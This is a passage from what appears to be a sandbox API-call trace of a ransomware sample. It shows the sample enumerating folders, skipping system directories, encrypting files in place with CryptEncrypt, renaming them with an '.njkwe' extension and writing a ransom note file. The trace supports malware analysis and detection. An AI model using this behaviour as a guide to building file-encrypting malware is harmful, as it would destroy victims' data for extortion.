ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.698] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.698] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.699] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.699] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\..") returned 33 [0060.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.699] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.699] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.699] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.699] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.699] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.699] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.699] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 39 [0060.699] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.699] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.699] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.699] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.699] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.699] GetTickCount () returned 0x114f9b3 [0060.699] GetTickCount () returned 0x114f9b3 [0060.699] GetTickCount () returned 0x114f9b3 [0060.699] GetTickCount () returned 0x114f9b3 [0060.699] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.699] GetProcessHeap () returned 0xbe0000 [0060.699] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.699] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xcf2, lpOverlapped=0x0) returned 1 [0060.774] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff30e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.774] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xcf2, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xcf2, lpOverlapped=0x0) returned 1 [0060.775] GetProcessHeap () returned 0xbe0000 [0060.775] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.775] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.775] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.775] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.775] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.775] CloseHandle (hObject=0x42c) returned 1 [0060.776] GetProcessHeap () returned 0xbe0000 [0060.776] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.776] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.778] GetProcessHeap () returned 0xbe0000 [0060.778] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.778] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.778] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.778] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.778] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.779] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.779] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.779] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 48 [0060.779] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.779] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.779] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.779] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.779] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.779] GetTickCount () returned 0x114fa01 [0060.779] GetTickCount () returned 0x114fa01 [0060.779] GetTickCount () returned 0x114fa01 [0060.779] GetTickCount () returned 0x114fa01 [0060.779] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.779] GetProcessHeap () returned 0xbe0000 [0060.779] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.779] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.781] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.781] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.781] GetProcessHeap () returned 0xbe0000 [0060.781] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.781] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.781] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.782] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.782] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.782] CloseHandle (hObject=0x42c) returned 1 [0060.789] GetProcessHeap () returned 0xbe0000 [0060.789] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.789] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.790] GetProcessHeap () returned 0xbe0000 [0060.790] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.790] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.790] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.790] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 49 [0060.790] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.790] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.790] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.790] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.790] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.792] GetTickCount () returned 0x114fa11 [0060.792] GetTickCount () returned 0x114fa11 [0060.792] GetTickCount () returned 0x114fa11 [0060.792] GetTickCount () returned 0x114fa11 [0060.792] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.792] GetProcessHeap () returned 0xbe0000 [0060.792] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.792] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.794] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.794] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.794] GetProcessHeap () returned 0xbe0000 [0060.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.794] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.794] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.794] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.794] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.794] CloseHandle (hObject=0x42c) returned 1 [0060.795] GetProcessHeap () returned 0xbe0000 [0060.795] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.795] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.796] GetProcessHeap () returned 0xbe0000 [0060.796] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.796] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.796] FindClose (in: hFindFile=0xc1a3a0 | out: hFindFile=0xc1a3a0) returned 1 [0060.796] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.796] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1030\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.796] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.797] CloseHandle (hObject=0x428) returned 1 [0060.797] GetProcessHeap () returned 0xbe0000 [0060.797] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.798] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1031", cAlternateFileName="")) returned 1 [0060.798] lstrcmpiW (lpString1="1031", lpString2="Windows") returned -1 [0060.798] lstrcmpiW (lpString1="1031", lpString2="$Recycle.bin") returned 1 [0060.798] lstrcmpiW (lpString1="1031", lpString2="System Volume Information") returned -1 [0060.798] lstrcmpiW (lpString1="1031", lpString2="Program Files") returned -1 [0060.798] lstrcmpiW (lpString1="1031", lpString2="Program Files (x86)") returned -1 [0060.798] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031") returned 30 [0060.798] lstrcmpW (lpString1="1031", lpString2=".") returned 1 [0060.798] lstrcmpW (lpString1="1031", lpString2="..") returned 1 [0060.798] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.798] GetProcessHeap () returned 0xbe0000 [0060.798] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.798] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\*") returned 32 [0060.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0060.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.799] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\.") returned 32 [0060.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.799] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.799] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.799] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\..") returned 33 [0060.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.799] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.799] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.799] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.799] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.799] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.799] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.800] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 39 [0060.800] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.800] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.800] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.800] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.800] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.800] GetTickCount () returned 0x114fa20 [0060.800] GetTickCount () returned 0x114fa20 [0060.800] GetTickCount () returned 0x114fa20 [0060.800] GetTickCount () returned 0x114fa20 [0060.800] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.800] GetProcessHeap () returned 0xbe0000 [0060.800] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.800] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xd5b, lpOverlapped=0x0) returned 1 [0060.801] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff2a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.802] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xd5b, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xd5b, lpOverlapped=0x0) returned 1 [0060.802] GetProcessHeap () returned 0xbe0000 [0060.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.802] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.802] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.802] WriteFile (in: hFile=0x42c, 